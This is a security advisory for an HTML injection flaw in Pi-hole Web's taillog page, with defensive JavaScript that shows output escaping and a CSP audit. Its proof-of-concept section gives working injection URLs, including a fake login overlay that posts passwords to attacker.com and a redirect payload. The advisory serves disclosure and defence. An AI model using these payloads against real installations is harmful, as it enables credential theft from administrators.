Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-33403 |
| Advisory | GHSA-7xqw-r9pr-qv59 |
| Vulnerability Type | Reflected DOM-based XSS / HTML Injection |
| Attack Vector | Network |
| CVSS v3.1 Base Score | 6.1 (Medium) |
| CVSS v3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| Affected Versions | Pi-hole Web v6.0 through v6.4.1 |
| Patched Version | v6.5 |
| Discovered By | Mohammed Alzahrani, andrejtomci, n1rwhex |
Description
Pi-hole Web versions 6.0 through 6.4.1 contain a reflected XSS / HTML injection vulnerability in `scripts/js/taillog.js`. The `file` query parameter is echoed into an error message that is inserted directly into the DOM via `innerHTML`, without sanitization or escaping.
Vulnerable code location: `scripts/js/taillog.js`, lines 99–101
Although the application's Content-Security-Policy blocks inline JavaScript execution, the CSP has no `form-action` directive and includes `style-src 'unsafe-inline'`. Because inline styles are allowed and form submission targets are unrestricted, an attacker can inject a fully styled HTML form that posts to an external origin, enabling credential harvesting without any script execution.
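The following is an added example, not code from the Pi-hole project, that models the sink the advisory describes and its hardened forms. The error-message wording, the function names, and the plain-object stand-in for a DOM element are assumptions; only the data flow (query parameter to `innerHTML`) comes from the advisory.

```javascript
// Added example: models the taillog.js sink described in the advisory.
// Not Pi-hole's code; message wording and function names are assumptions.

// Reads the `file` parameter the way browser code would from location.search.
// URLSearchParams decodes '+' to a space, which is why the PoC URLs use '+'.
function fileFromQuery(search) {
  const params = new URLSearchParams(search);
  return params.get("file") ?? "";
}

// Vulnerable pattern: untrusted value concatenated into markup destined for innerHTML.
function buildErrorMarkupUnsafe(file) {
  return "<strong>Error:</strong> could not read log file " + file;
}

// Minimal HTML escaping for text placed into an HTML element body or attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened pattern 1: escape before the value ever reaches innerHTML.
function buildErrorMarkupSafe(file) {
  return "<strong>Error:</strong> could not read log file " + escapeHtml(file);
}

// Hardened pattern 2: avoid the HTML sink entirely and assign text content.
// `el` can be a real DOM element or, as here, a plain object standing in for one;
// a browser renders textContent literally, so no escaping is needed.
function setErrorText(el, file) {
  el.textContent = "Error: could not read log file " + file;
  return el.textContent;
}

// Reviewer check over rendered markup: does any opening tag from the
// untrusted input survive byte-for-byte (i.e. unescaped)?
function inputSurvivesAsMarkup(rendered, input) {
  const tags = input.match(/<[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => rendered.includes(t));
}

// Constructed query string mirroring PoC 1 from the advisory.
const poc = '?file=<h1+style="color:red">INJECTED</h1>';
const file = fileFromQuery(poc);
console.log(file);
console.log(inputSurvivesAsMarkup(buildErrorMarkupUnsafe(file), file));
console.log(inputSurvivesAsMarkup(buildErrorMarkupSafe(file), file));
console.log(setErrorText({ textContent: "" }, file));
```

Run it with `node`; the unsafe builder passes the `<h1 ...>` tag through intact, while the escaped builder and the `textContent` path do not yield markup the browser would parse.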
Impact
An attacker who tricks a logged-in Pi-hole administrator into clicking a crafted link can:
- Harvest credentials via injected phishing forms that POST to an attacker-controlled server
- Redirect victims to arbitrary external domains via injected `<meta http-equiv="refresh">` tags
- Inject arbitrary HTML into the admin interface with full styling control
Proof of Concept
1. HTML Injection
Inject arbitrary styled HTML via the `file` parameter:
```
http://<PIHOLE_IP>/admin/taillog.php?file=<h1+style="color:red">INJECTED</h1>
```
2. Credential Phishing (Session Expired Overlay)
Inject a full-viewport fake "Session Expired" form that exfiltrates credentials:
```
http://<PIHOLE_IP>/admin/taillog.php?file=<div+style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999"><h2>Session+Expired</h2><form+action="https://attacker.com/collect"+method="POST"><input+name="password"+type="password"+placeholder="Re-enter+password"><button>Login</button></form></div>
```
3. Open Redirect
```
http://<PIHOLE_IP>/admin/taillog.php?file=<meta+http-equiv="refresh"+content="0;url=https://attacker.com">
```
Root Cause
Two contributing factors make this exploitable beyond basic HTML injection:
- Missing `form-action` CSP directive: injected forms can POST to any external origin
- `style-src 'unsafe-inline'`: injected elements can be styled to convincingly overlay the legitimate UI
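The following is an added example, not code from the Pi-hole project, that audits a CSP header for the two weaknesses named above. The two sample policies are constructed to match the advisory's description (inline script blocked, inline styles allowed, no `form-action`); they are not Pi-hole's actual header.

```javascript
// Added example: audits a Content-Security-Policy header for the two weaknesses
// named in the advisory. Sample policies are constructed, not Pi-hole's real header.

// Parses "dir a b; dir2 c" into { dir: ["a","b"], dir2: ["c"] }.
// Directive names are case-insensitive; the first occurrence of a name wins.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [rawName, ...sources] = tokens;
    const name = rawName.toLowerCase();
    if (!Object.prototype.hasOwnProperty.call(policy, name)) policy[name] = sources;
  }
  return policy;
}

// Effective source list for a directive, honouring default-src fallback.
// form-action is a navigation directive, not a fetch directive: it never
// inherits from default-src, so its absence means "unrestricted".
function effectiveSources(policy, directive) {
  if (Object.prototype.hasOwnProperty.call(policy, directive)) return policy[directive];
  if (directive === "form-action") return null;
  return policy["default-src"] ?? null;
}

// Returns a list of findings; an empty list means neither weakness is present
// and inline script is also blocked.
function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  if (effectiveSources(policy, "form-action") === null) {
    findings.push("form-action missing: injected <form> may POST to any origin");
  }
  const style = effectiveSources(policy, "style-src") ?? [];
  if (style.includes("'unsafe-inline'")) {
    findings.push("style-src allows 'unsafe-inline': injected elements can carry style attributes");
  }
  const script = effectiveSources(policy, "script-src") ?? [];
  if (script.length === 0 || script.includes("'unsafe-inline'")) {
    findings.push("script-src absent or allows 'unsafe-inline': injected <script> would execute");
  }
  return findings;
}

// Constructed policy approximating what the advisory describes.
const weakCsp = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'";
// Constructed hardened policy that closes both gaps used in PoCs 1 and 2.
const hardenedCsp = "default-src 'self'; script-src 'self'; style-src 'self'; form-action 'self'";

console.log(auditCsp(weakCsp));
console.log(auditCsp(hardenedCsp));
```

Two caveats worth keeping in mind when reading the output: a policy that sets only `default-src 'self'` still leaves `form-action` unrestricted, because navigation directives do not fall back to `default-src`; and no CSP directive governs a `<meta http-equiv="refresh">` navigation, so PoC 3 is closed only by escaping the output, not by tightening the header.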
Remediation
Update Pi-hole Web to version 6.5 or later:
```
pihole -up
```
The fix applies HTML escaping to error messages rendered in `taillog.js` and tightens the CSP policy.
References
Discovered and reported by Mohammed Alzahrani, andrejtomci, and n1rwhex.